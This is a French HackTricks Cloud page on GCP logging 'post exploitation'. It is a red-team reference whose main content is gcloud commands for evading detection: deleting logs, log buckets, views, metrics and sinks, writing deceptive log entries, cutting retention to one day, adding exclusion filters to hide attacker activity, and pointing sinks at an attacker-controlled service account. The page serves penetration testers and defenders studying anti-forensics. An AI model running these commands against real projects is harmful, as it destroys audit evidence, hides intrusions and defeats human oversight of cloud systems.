GCP - Logging Post Exploitation

Apprenez et pratiquez le Hacking AWS :Formation HackTricks AWS Red Team Expert (ARTE) Apprenez et pratiquez le Hacking GCP : Formation HackTricks GCP Red Team Expert (GRTE)

Soutenir HackTricks

Vérifiez les plans d'abonnement !
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez nous sur Twitter 🐦 @hacktricks_live.
Partagez des astuces de hacking en soumettant des PRs aux HackTricks et HackTricks Cloud dépôts github.

Informations de Base

Pour plus d'informations, consultez :

GCP - Logging Enum

Pour d'autres moyens de perturber la surveillance, consultez :

GCP - Monitoring Post Exploitation

Journalisation par Défaut

Par défaut, vous ne serez pas pris en flagrant délit simplement pour avoir effectué des actions de lecture. Pour plus d'infos, consultez la section Enum de Journalisation.

Ajouter un Principal Exempté

Dans https://console.cloud.google.com/iam-admin/audit/allservices et https://console.cloud.google.com/iam-admin/audit, il est possible d'ajouter des principaux pour ne pas générer de journaux. Un attaquant pourrait en abuser pour éviter d'être pris.

Lire les journaux - `logging.logEntries.list`

# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json

# Use these options to indicate a different bucket or view to use: --bucket=_Required  --view=_Default

`logging.logs.delete`

# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>

Écrire des journaux - `logging.logEntries.create`

# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR

`logging.buckets.update`

# Set retention period to 1 day (_Required has a fixed one of 400days)

gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1

`logging.buckets.delete`

# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>

`logging.links.delete`

# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>

`logging.views.delete`

# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global

`logging.views.update`

# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"

`logging.logMetrics.update`

# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID

`logging.logMetrics.delete`

# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>

`logging.sinks.delete`

# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>

`logging.sinks.update`

# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled

# Createa filter to exclude attackers logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"

# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> new-destination

# Change the service account to one withuot permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID

# Remove explusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions

# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables

Soutenir HackTricks

Consultez les plans d'abonnement!
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
Partagez des astuces de hacking en soumettant des PR aux HackTricks et HackTricks Cloud dépôts github.

PreviousGCP - KMS Post Exploitation NextGCP - Monitoring Post Exploitation

Last updated 3 days ago

Informations de Base

Journalisation par Défaut

Ajouter un Principal Exempté

Lire les journaux - logging.logEntries.list

logging.logs.delete

Écrire des journaux - logging.logEntries.create

logging.buckets.update

logging.buckets.delete

logging.links.delete

logging.views.delete

logging.views.update

logging.logMetrics.update

logging.logMetrics.delete

logging.sinks.delete

logging.sinks.update

Informations de Base

Journalisation par Défaut

Ajouter un Principal Exempté

Lire les journaux - logging.logEntries.list

logging.logs.delete

Écrire des journaux - logging.logEntries.create

logging.buckets.update

logging.buckets.delete

logging.links.delete

logging.views.delete

logging.views.update

logging.logMetrics.update

logging.logMetrics.delete

logging.sinks.delete

logging.sinks.update

Lire les journaux - `logging.logEntries.list`

`logging.logs.delete`

Écrire des journaux - `logging.logEntries.create`

`logging.buckets.update`

`logging.buckets.delete`

`logging.links.delete`

`logging.views.delete`

`logging.views.update`

`logging.logMetrics.update`

`logging.logMetrics.delete`

`logging.sinks.delete`

`logging.sinks.update`

Lire les journaux - `logging.logEntries.list`

`logging.logs.delete`

Écrire des journaux - `logging.logEntries.create`

`logging.buckets.update`

`logging.buckets.delete`

`logging.links.delete`

`logging.views.delete`

`logging.views.update`

`logging.logMetrics.update`

`logging.logMetrics.delete`

`logging.sinks.delete`

`logging.sinks.update`